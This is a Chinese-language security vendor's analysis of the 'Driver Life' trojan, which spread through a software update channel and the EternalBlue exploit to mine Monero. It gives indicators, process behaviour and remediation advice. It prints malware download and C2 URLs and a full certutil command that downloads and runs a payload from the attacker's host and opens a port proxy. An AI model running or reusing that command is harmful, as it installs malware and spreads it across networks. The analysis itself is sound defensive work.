“驅動人生”木馬詳細分析報告 2小時感染10萬臺電腦挖門羅幣

騰訊安全御見威脅情報中心監測發現，一款透過“驅動人生”升級通道，並同時利用“永恆之藍”高危漏洞傳播的木馬突然爆發，僅2個小時受攻擊使用者就高達10萬。“驅動人生”木馬會利用高危漏洞在企業內網呈蠕蟲式傳播，並進一步下載雲控木馬，在中毒電腦進行門羅幣挖礦。

一、概述

12月14日下午，騰訊安全御見威脅情報中心監測發現，一款透過“驅動人生”升級通道，並同時利用“永恆之藍”高危漏洞傳播的木馬突然爆發，僅2個小時受攻擊使用者就高達10萬。

“驅動人生”木馬會利用高危漏洞在企業內網呈蠕蟲式傳播，並進一步下載雲控木馬，在中毒電腦上進行門羅幣挖礦。雲控木馬對企業資訊保安威脅巨大，企業使用者須重點關注。

該病毒爆發剛好是週末時間，令企業網管猝不及防，週一工作日員工電腦開機後，建議立刻查殺病毒，再使用防毒軟體的漏洞修復功能安裝系統補丁。個人電腦使用者使用騰訊電腦管家即可防禦。

本次病毒爆發有三個特點：

1。驅動人生升級通道傳播的病毒會在中毒電腦安裝雲控木馬；

2。病毒會利用永恆之藍漏洞在區域網內主動擴散；

3。透過雲端控制收集中毒電腦部分資訊，接受雲端指令在中毒電腦進行門羅幣挖礦。

木馬攻擊流程圖

二、詳細分析

dtlupg。exe訪問以下url下載病毒

hxxp：//xxxx。update。ackng。com/ziptool/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69。exe

hxxp：//xxxx。update。ackng。com/calendar/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69。exe

（注意，為避免網友點選以上鍊接可以直接下載病毒程式，對部分字元做了隱藏處理）

病毒檔案釋放在：

C：\Program Files （x86）\DTLSoft\rili\Updater\ctrlf\f79cb9d2893b254cc75dfb7f3e454a69。exe等位置執行。

f79cb9d2893b254cc75dfb7f3e454a69。exe 執行後最終釋放出 C：\WINDOWS\Temp\svvhost。exe

（MD5：2E9710A4B9CBA3CD11E977AF87570E3B）執行，svvhost。exe打包了“永恆之藍”等漏洞攻擊工具在內外網進一步擴散。

2.1 病毒母體

F79CB9D2893B254CC75DFB7F3E454A69。exe

執行後將自身複製到C：\windows\system32\svhost。exe，安裝為服務並啟動，服務名為Ddiver，並在隨後拉起雲控模組svhhost。exe、攻擊模組svvhost。exe。

執行時先檢測互斥體，確定是否已感染過。

透過檢測以下程序將殺軟資訊蒐集準備上傳。

360tray。exe|360sd。exe|avp。exe|KvMonXP。exe|RavMonD。exe|Mcshield。exe|egui。exe|kxetray。exe|knsdtray。exe|TMBMSRV。exe|avcenter。exe|ashDisp。exe|rtvscan。exe|ksafe。exe|QQPCRTP。exe

檢測到任務管理器及遊戲程序則將雲控模組svhhost。exe退出。

開啟互斥體，物件名稱為“I am tHe xmr reporter” ，xmr意指xmrig。exe礦機。

蒐集系統敏感資訊上傳到hxxp：//i。haqo。net/i。png，並接受返回的雲控程式碼等待執行。

母體設定程序共享記憶體HSKALWOEDJSLALQEOD

2.2 挖礦

雲控木馬svhhost。exe其主要功能是，從母體程序svhost。exe共享記憶體中讀取shellcode解密並執行，每隔2000秒讀取一次共享記憶體中的shellcode進行解密執行，共享記憶體名為HSKALWOEDJSLALQEOD，目前該shellcode主要功能挖礦，不排除後期會拉取其他更加惡意如加密勒索等木馬病毒執行

雲控木馬執行流程

雲控木馬執行後會建立一個執行緒，該執行緒函式主要功能是判斷程序svhost。exe（母體程序）是否存在，不存在的話則啟動該程序，接下來要讀取的共享記憶體資料就是從該程序進行讀取

建立執行緒判斷母體程序是否存在

呼叫OpenFileMappingA開啟共享記憶體，讀取共享記憶體資料

讀取共享記憶體資料

呼叫RtlDecompressBuffer函式解壓共享記憶體中的資料，為下一步執行做準備

解壓共享記憶體資料

共享記憶體資料加壓完後會執行，目前該shellcode主要功能挖礦，不排除後期會拉取其他更加惡意如加密勒索等木馬病毒執行

執行shellcode

嘗試挖礦時通訊IP為172。105。204。237

2.3 攻擊模組

攻擊模組從地址hxxp：//dl。haqo。net/eb。exez下載，作為子程序Svvhost。Exe啟動，分析發現該檔案是透過python實現的“永恆之藍”漏洞利用模組壓縮打包程式。

子程序Svvhost。Exe為將python實現的“永恆之藍”漏洞利用模組壓縮打包程式。

Mysmb。pyo為攻擊時掃描程式碼。

GitHub上也可以看到相關開原始碼

掃描內網445埠進行攻擊

不僅攻擊內網漏洞機器，還隨機找幾個外網IP嘗試攻擊，1次攻擊完後沉默20分鐘

攻擊成功後paylaod在中招機器執行以下命令進行內網擴散傳播

cmd。exe /c certutil -urlcache -split -f http：//dl。haqo。net/dl。exe c：/install。exe&c：/install。exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1。1。1。1 connectport=53

安全建議

1。 伺服器暫時關閉不必要的埠（如135、139、445），方法可參考：https：//guanjia。qq。com/web_clinic/s8/585。html

2。 企業使用者在週一上班後，建議使用騰訊御點查殺病毒（個人使用者可使用騰訊電腦管家），然後使用漏洞修復功能，修復全網終端存在的系統高危漏洞；

3。 伺服器使用高強度密碼，切勿使用弱口令，防止駭客暴力破解；

4。 使用防毒軟體攔截可能的病毒攻擊；

5。 推薦企業使用者部署騰訊御界高階威脅檢測系統防禦可能的駭客攻擊。御界高階威脅檢測系統，是基於騰訊反病毒實驗室的安全能力、依託騰訊在雲和端的海量資料，研發出的獨特威脅情報和惡意檢測模型系統。